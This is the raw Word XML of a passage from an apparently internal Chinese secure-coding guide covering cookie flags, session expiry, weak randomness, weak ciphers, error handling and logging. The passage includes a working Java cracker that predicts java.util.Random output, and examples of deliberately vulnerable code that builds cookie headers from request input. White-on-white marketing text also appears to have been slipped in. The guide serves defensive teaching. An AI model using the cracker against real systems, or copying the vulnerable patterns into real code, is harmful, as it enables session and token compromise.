only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，是设置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COOKIE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时，可以设置的一个属性，如果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COOKIE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没有设置这个属性，该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COOKIE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值可以被页面脚本读取。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当攻击者发现一个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XSS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漏洞时，通常会写一段页面脚本，窃取用户的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COOKIE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，为了增加攻击者的门槛，防止出现因为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XSS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漏洞导致大面积用户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COOKIE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被盗，所以应该在设置认证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COOKIE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时，增加这个属性。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代码示例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设置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cookie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的代码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lastRenderedPageBreak/>
        <w:t>response.setHeader("SET-COOKIE", "user=" + request.getParameter("cookie")); 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这段代码没有设置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http only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属性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攻击实例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见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“Cross Site Script”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章节。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解决方案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设置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cookie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时，加入属性即可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response.setHeader("SET-COOKIE", "user=" + request.getParameter("cookie") + "; HttpOnly");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下图可以看到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cookie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已经加入了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httponly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属性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常见问题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1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、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在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cookie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类中没有找到设置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httponly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的方法？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目前的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jdk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版本只支持在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setHeader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时，设置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httponly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。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2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、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 xml:space="preserve"> httponly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已经可以防止用户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cookie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被窃取，还需要做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XSS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防御吗？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这个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flag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只能增加攻击者的难度，不能达到完全防御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XSS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攻击。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Cookie Secure flag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名称定义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Cookie Secure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，是设置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COOKIE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时，可以设置的一个属性，设置了这个属性后，只有在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https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访问时，浏览器才会发送该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COOKIE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。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浏览器默认只要使用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http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请求一个站点，就会发送明文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cookie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，如果网络中有监控，可能被截获。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如果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web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应用网站全站是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https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的，可以设置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cookie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加上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Secure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属性，这样浏览器就只会在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https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访问时，发送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cookie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。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攻击者即使窃听网络，也无法获取用户明文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cookie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。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代码示例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 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设置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cookie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的代码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response.setHeader("SET-COOKIE", "user=" + request.getParameter("cookie") + "; HttpOnly");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这段代码没有设置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Secure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属性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攻击方法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进行网络监听，可以看到下图是没有设置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Secure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属性的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COOKIE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发送的数据包。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解决方案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在设置认证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COOKIE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时，加入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Secure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。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代码：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response.setHeader("SET-COOKIE", "user=" + request.getParameter("cookie") + "; HttpOnly ; Secure ");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再次访问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http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网站，抓数据包可以看到，已经不再发送这个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COOKIE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了。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lastRenderedPageBreak/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Session Expires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安全威胁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Session Expires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，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Session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有效期安全攻击。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由于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Session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没有在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web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应用中设置强制超时时间，攻击者一旦曾经获取过用户的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Session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，就可以一直使用。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代码示例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设置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cookie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的代码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response.setHeader("SET-COOKIE", "user=" + request.getParameter("cookie") + "; HttpOnly ; Secure ");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这段代码没有在服务器中设置强制超时时间。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 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攻击实例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利用网络监听，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xss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等一些手段获取用户的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cookie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，之后就可以一直使用用户身份登录。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具体见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“Cross Site Script”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章节或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“Cookie Secure”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章节的示例。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解决方案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在设置认证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cookie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中，加入两个时间，一个是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“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即使一直在活动，也要失效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”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的时间，一个是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“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长时间不活动的失效时间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”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。并在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web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应用中，首先判断两个时间是否已超时，再执行其他操作。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示例：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A5775" w:rsidRPr="00E413A6" w:rsidRDefault="001807CD" w:rsidP="001807CD"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 xml:space="preserve">        // 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判断会员的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cookie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是否过期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        if (isLogin) {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            String timeStampStr = (String) map.get(UserAuthenticationContext.TIMESTAMP);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            long loginTime = 0;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            try {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                loginTime = Long.parseLong(timeStampStr); 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            } catch (NumberFormatException e) {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                if (logger.isInfoEnabled()) {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                    logger.info(" loginId: " + usr.getLoginId() + " timestamp has exception " + timeStampStr);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                }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            }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            long now = System.currentTimeMillis() / 1000;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            if (now - loginTime &gt; UserAuthenticationContext.COOKIE_VALIDITY) {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                usr.setAuthenticated(false, true); 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                if (logger.isInfoEnabled()) {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                    logger.info("loginId: " + usr.getLoginId() + " loginTime: " + loginTime + " nowTime: " + now);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                }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lastRenderedPageBreak/>
        <w:t>            }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        }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第七章密码算法安全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Insecure Pseudo randomness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安全威胁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Insecure Pseudo randomness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，伪随机性。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由于计算机的本质是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“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存储运算控制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”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，因此它所采用的随机数算法实际上是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“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伪随机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”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的。为了编写代码来实现类似随机的算法，常见情况下，伪随机数生成器生成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 xml:space="preserve"> 0 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到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 xml:space="preserve"> N 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之间的一个整数，返回的整数再除以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 xml:space="preserve"> N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。得出的数字总是处于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 xml:space="preserve"> 0 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和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 xml:space="preserve"> 1 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之间。对生成器随后的调用采用第一次运行产生的整数，并将它传给一个函数，以生成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 xml:space="preserve"> 0 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到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 xml:space="preserve"> N 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之间的一个新整数，然后再将新整数除以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 xml:space="preserve"> N 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返回。这意味着，由任何伪随机数生成器返回的数目会受到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 xml:space="preserve"> 0 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到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 xml:space="preserve"> N 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之间整数数目的限制。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 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伪随机数生成器将作为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“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种子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”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的数当作初始整数传给函数。这粒种子会使这个球（生成伪随机数）一直滚下去。伪随机数生成器的结果仅仅是不可预测。由伪随机数生成器返回的每一个值完全由它返回的前一个值所决定（最终，该种子决定了一切）。如果知道用于计算任何一个值的那个整数，那么就可以算出从这个生成器返回的下一个值。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这也就是伪随机数攻击的本质，即穷举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“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随机种子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”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（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PRNG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）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该漏洞可能导致依赖随机数的应用（例如依靠随机数生成的图法签名）可能会被人破解。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代码示例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1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、下面是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Radom()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函数的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Java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实现：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    public Random(long seed) {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        this.seed = new AtomicLong(0L);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        setSeed(seed);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}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    public int nextInt() {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return next(32);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    }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    protected int next(int bits) {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        long oldseed, nextseed;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        AtomicLong seed = this.seed; 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        do {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     oldseed = seed.get();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     nextseed = (oldseed * multiplier + addend) &amp; mask;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        } while (!seed.compareAndSet(oldseed, nextseed));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        return (int)(nextseed &gt;&gt;&gt; (48 - bits));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    }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这段代码依靠确定的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seed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种子来运算出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nextseed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的值，尽管使用了各种运算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但结果仍然是线性可预测的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2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、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参考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1996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年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Netscape1.1.40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的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SSL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加密种子被攻破的实例：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http://www.cs.berkeley.edu/~daw/papers/ddj-netscape.html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攻击实例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lastRenderedPageBreak/>
        <w:t>由于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 xml:space="preserve">Java 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下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Random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种子的伪随机特点，因此可以通过前两次的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Random.nextInt()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结果来猜测下一个随机数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public class RandomCracker {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protected static final long a=0x5deece66dL;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protected static final long b=0xbL;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protected static final long m=(1L&lt;&lt;48)-1;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/**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*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 xml:space="preserve">* @param xint0    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第一次调用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nextInt()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获取的随机整数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 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 xml:space="preserve">* @param xint1 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第二次调用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nextInt()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获取的随机整数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 xml:space="preserve">* @output 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下一次的随机数值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*/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public static void crack(int xint0,int xint1)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  {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long i;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long seed=-1L;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long x0=(xint0&amp;0xFFFFFFFFL)&lt;&lt;16;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long x1=(xint1&amp;0xFFFFFFFFL);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for(i=0;i&lt;0xFFFFL;i++){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    seed=(((x0+i)*a)+b)&amp;m;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    if ((seed&gt;&gt;&gt;16)==x1){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    break;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    }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seed=-1L;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}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if (seed==-1L)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  {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  throw new RuntimeException("Input Error!");}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else{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System.out.println("The Cracked x2="+(int)(((seed*a)+b&amp;m)&gt;&gt;&gt;16));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}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}}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解决方案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1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、在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java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中，推荐采用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secureRandom()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函数代替伪随机的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Random()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函数。该算法提供了强随机的种子算法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(SHA1PRNG)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2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、使用随机算法时，尽量将随机数种子复杂化，例如在以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ServerTime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作为随机种子时，在其后面加一个固定的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“offside”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整数值，这样可以有效避免被猜到随机种子的来源。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 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Insufficient Encryption Strength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安全威胁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Insufficient Encryption Strength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，弱加密强度。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lastRenderedPageBreak/>
        <w:t>项目中设计到敏感信息的数据采用程序员自己编写的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“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简单算法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”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加密，一旦被人获取足够的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“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样本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”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，将有可能被反向推测出解密算法，从而泄露重要信息。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一些低强度的密码算法，如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DES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、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RC2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等已经可以很容易的在短时间内被人所破解，其它一些容易被误用的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“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密码算法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”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，如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base64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、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escape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、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urlencode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等，其实并不是密码算法，只是简单的编码而已，不能起到密码算法保护信息的作用。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代码示例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1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、线性加密算法，下面以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“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古典密码算法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”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为例：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• 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public class Caesar {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public static void encode(String PlainText, int Offset) {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  String CipherText = "";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  for (int i = 0; i &lt; PlainText.length(); i++) {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   if (PlainText.charAt(i) == 32)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   CipherText += (char)(32);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   else if (PlainText.charAt(i) &gt;= 'a' &amp;&amp; PlainText.charAt(i) &lt;= 'z')    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    CipherText += (char)('a' + ((PlainText.charAt(i) - 'a' + Offset) % 26));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   else if (PlainText.charAt(i) &gt;= 'A' &amp;&amp; PlainText.charAt(i) &lt;= 'Z')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    CipherText += (char)('A' + ((PlainText.charAt(i) - 'A' + Offset) % 26));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   else if (PlainText.charAt(i) &gt;= '0' &amp;&amp; PlainText.charAt(i) &lt;= '9')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    CipherText += (char)('0' + ((PlainText.charAt(i) - '0' + Offset) % 10));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  }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  System.out.println("Ciphertext: " + CipherText);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}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2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、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FoxMail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企业地址簿口令使用弱加密算法等漏洞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攻击实例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破解方法：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1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、第一种是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“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基于明文密文对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”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的破解，由于在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“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古典加密算法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”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中同一字符每次都是映射到另一字符，因此，只要获取到一定数量的明文和加密后的密文，就可以清楚的还原出每个字符的映射关系。并且可以通过映射关系，可以写出解密程序，如下所示。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 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2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、第二种是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“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只基于密文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”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的破解，在一定量的日常报文中，每个字母出现的频率是基本一致的，并且在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“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古典加密算法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”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中同一字符每次都是映射到另一字符，因此可以根据密文中每个字母出现的频率猜测出映射关系。并且可以通过映射关系，可以写出解密程序，如下所示。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public static void decode(String CipherText, int Offset) {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  String PlainText = "";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  for (int i = 0; i &lt; CipherText.length(); i++) {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   if (CipherText.charAt(i) == 32)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    PlainText += (char)(32);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   else if (CipherText.charAt(i) &gt;= 'a' &amp;&amp; CipherText.charAt(i) &lt;= 'z')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    if((CipherText.charAt(i) - Offset) &lt; 'a'){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     PlainText += (char)('z' - ('a' - (CipherText.charAt(i) - Offset)) + 1);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     }else{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       PlainText += (char)('a' + ((CipherText.charAt(i) - 'a' - Offset) % 26)); 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lastRenderedPageBreak/>
        <w:t>      }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   else if (CipherText.charAt(i) &gt;= 'A' &amp;&amp; CipherText.charAt(i) &lt;= 'Z')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    if((CipherText.charAt(i) - Offset) &lt; 'A'){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     PlainText += (char)('Z' - ('A' - (CipherText.charAt(i) - Offset)) + 1);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     }else{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       PlainText += (char)('A' + ((CipherText.charAt(i) - 'A' - Offset) % 26));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      }   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   else if (CipherText.charAt(i) &gt;= '0' &amp;&amp; CipherText.charAt(i) &lt;= '9')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    if((CipherText.charAt(i) - Offset) &lt; '0'){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     PlainText += (char)('9' - ('0' - (CipherText.charAt(i) - Offset)) + 1);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     }else{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       PlainText += (char)('0' + ((CipherText.charAt(i) - '0' - Offset) % 10)); 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      }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  }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  System.out.println("PlainText: " + PlainText);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}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解决方案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1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、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禁止使用自己编写的密码算法。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2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、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不要将编码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(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如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Base64)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和密码算法混为一谈，前者不是密码算法。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3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、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不要使用低强度的密码算法，如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DES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、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RC2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等，必须采用符合业内安全强度标准的密码算法，见下表：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安全目的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保密性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认证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不可抵赖性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保密性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认证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不可抵赖性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保密性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认证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不可抵赖性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完整性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完整性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来源认证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算法强度（按对称密钥长度和算法安全期限）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对称算法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 xml:space="preserve"> DSA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电子签名算法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 xml:space="preserve"> RSA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算法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 xml:space="preserve"> ECC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算法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摘要算法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 xml:space="preserve"> HMAC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信息验证码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安全强度为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 xml:space="preserve"> 80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位；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安全时间到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2010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年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 xml:space="preserve"> 2TDES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3TDES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AES-128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AES-192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 xml:space="preserve">AES-256 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最小长度：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公钥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 xml:space="preserve"> = 1024;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私钥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 xml:space="preserve"> =160 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最小长度：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密钥对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 xml:space="preserve">=1024 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最小长度：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密钥对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=160 SHA-1,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SHA-224,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SHA-256,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SHA-384,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SHA-512 SHA-1,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lastRenderedPageBreak/>
        <w:t>SHA-224,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SHA-256,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SHA-384,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SHA-512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安全强度为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112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位；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安全时间到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2030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年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 xml:space="preserve"> 3TDES </w:t>
      </w:r>
      <w:r w:rsidRPr="001807CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>广东传世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 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AES-128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AES-192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 xml:space="preserve">AES-256 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最小长度：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公钥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 xml:space="preserve"> = 2048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私钥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 xml:space="preserve"> = 224 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最小长度：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密钥对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 xml:space="preserve">=2048 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最小长度：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密钥对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=224 SHA-224,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SHA-256,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SHA-384,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SHA-512 SHA-1,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SHA-224,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SHA-256,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SHA-384,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SHA-512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注：参考文档：《证书及密钥安全标准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v6DC-0216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》，刘坤，阿里云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-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集团信息安全中心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第八章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错误处理与日志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Error Handling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安全威胁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Error Handling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错误处理。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在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web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应用程序出错时，会返回一些程序异常信息，从而暴露很多对攻击者有用的信息，攻击者可以利用这些错误信息，制定下一步攻击方案。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代码示例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如下代码是做数据库查询的：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try {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   PreparedStatement pst = conn.prepareStatement(sql);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   ResultSet rs  = pst.executeQuery();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   while(rs.next()){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    User u = new User();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    u.setId(rs.getLong("id"));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    u.setName(rs.getString("name"));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    u.setPass(rs.getString("pass")); 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    u.setType(rs.getInt("type"));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    userlist.add(u);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   }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   System.out.println();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   if(rs != null) rs.close();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lastRenderedPageBreak/>
        <w:t>   if(pst  != null) pst.close();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   if(conn != null) conn.close();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  } catch (SQLException e) {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   // TODO Auto-generated catch block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   e.printStackTrace();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  }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直接抛出了错误异常，没有经过任何处理。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攻击实例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在进行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SQL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注入攻击时，攻击者提交可以让程序出错的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get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请求，导致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web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应用展现了错误页面：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看到这个信息，攻击者可以做以下判断：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1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、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数据库是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oracle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。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2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、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查询语句的列数不正确。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根据这个判断，攻击者调整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get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请求的内容，最终达到获取数据库所有数据的目的。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解决方案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配置错误页面，让所有的错误都只显示友好信息，不显示任何与实际错误相关的信息。例如以下页面：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Logging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记录日志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在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web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应用运行的过程中，必须开启安全日志。当疑似攻击发生时，对用户的当前请求，记录日志。在所有安全方案中需要记录日志的地方，都应该按照本章节的要求记录日志，以便回溯攻击场景。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 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日志存储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日志文件要单独放在服务器上，不能和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web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容器的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log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放在同一个文件中，并且是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http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无法直接访问到的地方，例如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  /home/admin/tomcat/logs/security(date).log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日志存储要预留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http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接口，以便需要时将日志通过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http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，发送到统一的服务器上。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日志字段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字段按照以下要求记录，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http request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包可配置，平时可以不打开，当受到攻击频繁时，临时开启。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字段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 xml:space="preserve">       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说明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 xml:space="preserve">IP      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访问者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IP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地址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用户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 xml:space="preserve">id     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如果用户已登录，可以记录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用户名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 xml:space="preserve">     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如果用户已登录，可以记录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 xml:space="preserve">cookie     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当前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http request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中的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cookie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method     POST/GET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http request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数据包内容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 xml:space="preserve">  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可配置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动作描述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 xml:space="preserve">     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可能发生的攻击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分类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 xml:space="preserve">      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可能发生的攻击类型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威胁级别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 xml:space="preserve">     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根据漏洞类型定义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攻击者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/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受攻击者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 xml:space="preserve">    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本次事件是攻击者的请求，还是被攻击者的请求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时间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 xml:space="preserve">      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攻击发生的时间，要以服务器时间为准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 </w:t>
      </w:r>
      <w:r w:rsidRPr="001807CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>品牌营销</w:t>
      </w:r>
      <w:r w:rsidRPr="001807CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="001807CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>网站建设</w:t>
      </w:r>
      <w:r w:rsidRPr="001807CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001807CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>策划营销</w:t>
      </w:r>
      <w:r w:rsidRPr="001807CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001807CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>运营</w:t>
      </w:r>
      <w:r w:rsidRPr="001807CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>推广</w:t>
      </w:r>
      <w:r w:rsidRPr="001807CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001807CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>电商服务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 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第九章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Changelog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添加密码安全章节，添加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error handing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章节，添加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flash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章节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   --  2010-7-7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周拓修正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Cross Site Script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章节错误，李昊、刘坤校对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     --  2010-8-20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第十章相关链接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中文站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CSRF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方案：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http://security.alibaba-inc.com/twiki/bin/view/Security/SecuritySolution/%E4%B8%AD%E6%96%87%E7%AB%99CSRF%E6%96%B9%E6%A1%88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Ibatis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防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SQL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注射方案：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http://security.alibaba-inc.com/twiki/bin/view/Security/SecuritySolution/Ibatis%E9%98%B2SQL%E6%B3%A8%E5%B0%84%E6%96%B9%E6%A1%88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JavaScript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编码安全规范：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http://security.alibaba-inc.com/twiki/bin/view/Security/SecuritySolution/JavaScript%e7%bc%96%e7%a0%81%e5%ae%89%e5%85%a8%e8%a7%84%e8%8c%83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Velocity</w:t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跨站修补方案：</w:t>
      </w:r>
      <w:r w:rsidRPr="001807CD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807CD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  <w:t>http://security.alibaba-inc.com/twiki/bin/view/Security/SecuritySolution/Velocity%E8%B7%A8%E7%AB%99%E4%BF%AE%</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="007A5775" w:rsidRPr="00E413A6" w:rsidSect="00B07B2B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1440" w:right="1558" w:bottom="993" w:left="156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7A3A" w:rsidRDefault="00107A3A" w:rsidP="006C237E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00107A3A" w:rsidRDefault="00107A3A" w:rsidP="006C23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162F" w:rsidRDefault="006C162F" w:rsidP="006C162F">
    <w:pPr>
      <w:pStyle w:val="a4"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:lang w:val="zh-CN"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r w:rsidR="00790BA7">
      <w:rPr>
        <w:b/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
      </w:rPr>
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r w:rsidR="00790BA7">
      <w:rPr>
        <w:b/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="001807CD">
      <w:rPr>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>37</w:t>
    </w:r>
    <w:r w:rsidR="00790BA7">
      <w:rPr>
        <w:b/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:lang w:val="zh-CN"/>
      </w:rPr>
      <w:t xml:space="preserve"> / </w:t>
    </w:r>
    <w:r w:rsidR="00790BA7">
      <w:rPr>
        <w:b/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
      </w:rPr>
      <w:instrText>NUMPAGES</w:instrText>
    </w:r>
    <w:r w:rsidR="00790BA7">
      <w:rPr>
        <w:b/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="001807CD">
      <w:rPr>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>38</w:t>
    </w:r>
    <w:r w:rsidR="00790BA7">
      <w:rPr>
        <w:b/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w:rsidR="006C162F" w:rsidRDefault="006C162F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7A3A" w:rsidRDefault="00107A3A" w:rsidP="006C237E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00107A3A" w:rsidRDefault="00107A3A" w:rsidP="006C237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2934" w:rsidRDefault="00107A3A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949360" o:spid="_x0000_s2051" type="#_x0000_t136" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:531pt;height:88.5pt;rotation:315;z-index:-251658240;mso-position-horizontal:center;mso-position-horizontal-relative:margin;mso-position-vertical:center;mso-position-vertical-relative:margin" o:allowincell="f" fillcolor="#d8d8d8" stroked="f">
          <v:fill opacity=".5"/>
          <v:textpath style="font-family:&quot;宋体&quot;;font-size:1pt" string="Confidential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237E" w:rsidRDefault="00107A3A" w:rsidP="0038317E">
    <w:pPr>
      <w:pStyle w:val="a3"/>
      <w:ind w:firstLineChars="3900" w:firstLine="7020"/>
      <w:jc w:val="right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949361" o:spid="_x0000_s2052" type="#_x0000_t136" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:531pt;height:88.5pt;rotation:315;z-index:-251657216;mso-position-horizontal:center;mso-position-horizontal-relative:margin;mso-position-vertical:center;mso-position-vertical-relative:margin" o:allowincell="f" fillcolor="#d8d8d8" stroked="f">
          <v:fill opacity=".5"/>
          <v:textpath style="font-family:&quot;宋体&quot;;font-size:1pt" string="Confidential"/>
          <w10:wrap anchorx="margin" anchory="margin"/>
        </v:shape>
      </w:pict>
    </w:r>
    <w:r w:rsidR="00624C0C">
      <w:rPr>
        <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        <w:color w:val="000000"/>
      </w:rPr>
      <w:t>③秘密信息 严禁泄露</w:t>
    </w:r>
    <w:r w:rsidR="00400747">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251656192" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>23495</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-178435</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="1343025" cy="319405"/>
          <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
          <wp:wrapNone/>
          <wp:docPr id="1" name="图片 3" descr="说明: F:\各种logo\kingdee.w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3" descr="说明: F:\各种logo\kingdee.wm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43025" cy="31940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2934" w:rsidRDefault="00107A3A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949359" o:spid="_x0000_s2050" type="#_x0000_t136" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:531pt;height:88.5pt;rotation:315;z-index:-251659264;mso-position-horizontal:center;mso-position-horizontal-relative:margin;mso-position-vertical:center;mso-position-vertical-relative:margin" o:allowincell="f" fillcolor="#d8d8d8" stroked="f">
          <v:fill opacity=".5"/>
          <v:textpath style="font-family:&quot;宋体&quot;;font-size:1pt" string="Confidential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764538"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="480E9F9C"/>
    <w:lvl w:ilvl="0" w:tplc="9FAE883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81A09B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2B6FA3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E54718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B4A5C1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F2E499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F9615D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D2764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312AD4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B7DE7"/>
    <w:rsid w:val="00026BCE"/>
    <w:rsid w:val="00044C81"/>
    <w:rsid w:val="00067A2E"/>
    <w:rsid w:val="000A2612"/>
    <w:rsid w:val="000A57EB"/>
    <w:rsid w:val="000D26B6"/>
    <w:rsid w:val="00107A3A"/>
    <w:rsid w:val="001256E1"/>
    <w:rsid w:val="00132A14"/>
    <w:rsid w:val="001807CD"/>
    <w:rsid w:val="001A657E"/>
    <w:rsid w:val="002176D3"/>
    <w:rsid w:val="00225B8A"/>
    <w:rsid w:val="002A2E7C"/>
    <w:rsid w:val="002C5BA6"/>
    <w:rsid w:val="002D068E"/>
    <w:rsid w:val="00325BC1"/>
    <w:rsid w:val="0038317E"/>
    <w:rsid w:val="003B7DE7"/>
    <w:rsid w:val="003D32A9"/>
    <w:rsid w:val="003D5531"/>
    <w:rsid w:val="003E226D"/>
    <w:rsid w:val="00400747"/>
    <w:rsid w:val="00425416"/>
    <w:rsid w:val="00460887"/>
    <w:rsid w:val="0048668C"/>
    <w:rsid w:val="004902B7"/>
    <w:rsid w:val="004D2956"/>
    <w:rsid w:val="004F36AF"/>
    <w:rsid w:val="00502B5B"/>
    <w:rsid w:val="00544DF6"/>
    <w:rsid w:val="00553603"/>
    <w:rsid w:val="005630F4"/>
    <w:rsid w:val="00570DCC"/>
    <w:rsid w:val="00577A0F"/>
    <w:rsid w:val="00590E32"/>
    <w:rsid w:val="005D008F"/>
    <w:rsid w:val="00600EBB"/>
    <w:rsid w:val="00624C0C"/>
    <w:rsid w:val="00651892"/>
    <w:rsid w:val="006534F4"/>
    <w:rsid w:val="00665F57"/>
    <w:rsid w:val="00672EFB"/>
    <w:rsid w:val="00682934"/>
    <w:rsid w:val="006B05C6"/>
    <w:rsid w:val="006C162F"/>
    <w:rsid w:val="006C237E"/>
    <w:rsid w:val="006F71F9"/>
    <w:rsid w:val="00725C1A"/>
    <w:rsid w:val="00751A9D"/>
    <w:rsid w:val="00752689"/>
    <w:rsid w:val="0077437D"/>
    <w:rsid w:val="00790BA7"/>
    <w:rsid w:val="007971E2"/>
    <w:rsid w:val="007A5775"/>
    <w:rsid w:val="007D15BA"/>
    <w:rsid w:val="007D6EBD"/>
    <w:rsid w:val="00827EE3"/>
    <w:rsid w:val="00851504"/>
    <w:rsid w:val="008A1490"/>
    <w:rsid w:val="00927492"/>
    <w:rsid w:val="0096380B"/>
    <w:rsid w:val="00984F48"/>
    <w:rsid w:val="009C247C"/>
    <w:rsid w:val="009F2DF3"/>
    <w:rsid w:val="00A2053C"/>
    <w:rsid w:val="00A218A1"/>
    <w:rsid w:val="00A22B26"/>
    <w:rsid w:val="00A52109"/>
    <w:rsid w:val="00A82D97"/>
    <w:rsid w:val="00B07B2B"/>
    <w:rsid w:val="00B36581"/>
    <w:rsid w:val="00B44B7F"/>
    <w:rsid w:val="00BD72E3"/>
    <w:rsid w:val="00BE1662"/>
    <w:rsid w:val="00C07C43"/>
    <w:rsid w:val="00C23E71"/>
    <w:rsid w:val="00C3015C"/>
    <w:rsid w:val="00C33EAA"/>
    <w:rsid w:val="00C6429D"/>
    <w:rsid w:val="00CB1951"/>
    <w:rsid w:val="00CC0917"/>
    <w:rsid w:val="00D030F1"/>
    <w:rsid w:val="00D66129"/>
    <w:rsid w:val="00E35061"/>
    <w:rsid w:val="00E413A6"/>
    <w:rsid w:val="00E47828"/>
    <w:rsid w:val="00E87BF5"/>
    <w:rsid w:val="00E924F7"/>
    <w:rsid w:val="00EA12FD"/>
    <w:rsid w:val="00EB409A"/>
    <w:rsid w:val="00EC5F7C"/>
    <w:rsid w:val="00EF2F93"/>
    <w:rsid w:val="00F2316B"/>
    <w:rsid w:val="00F31DD5"/>
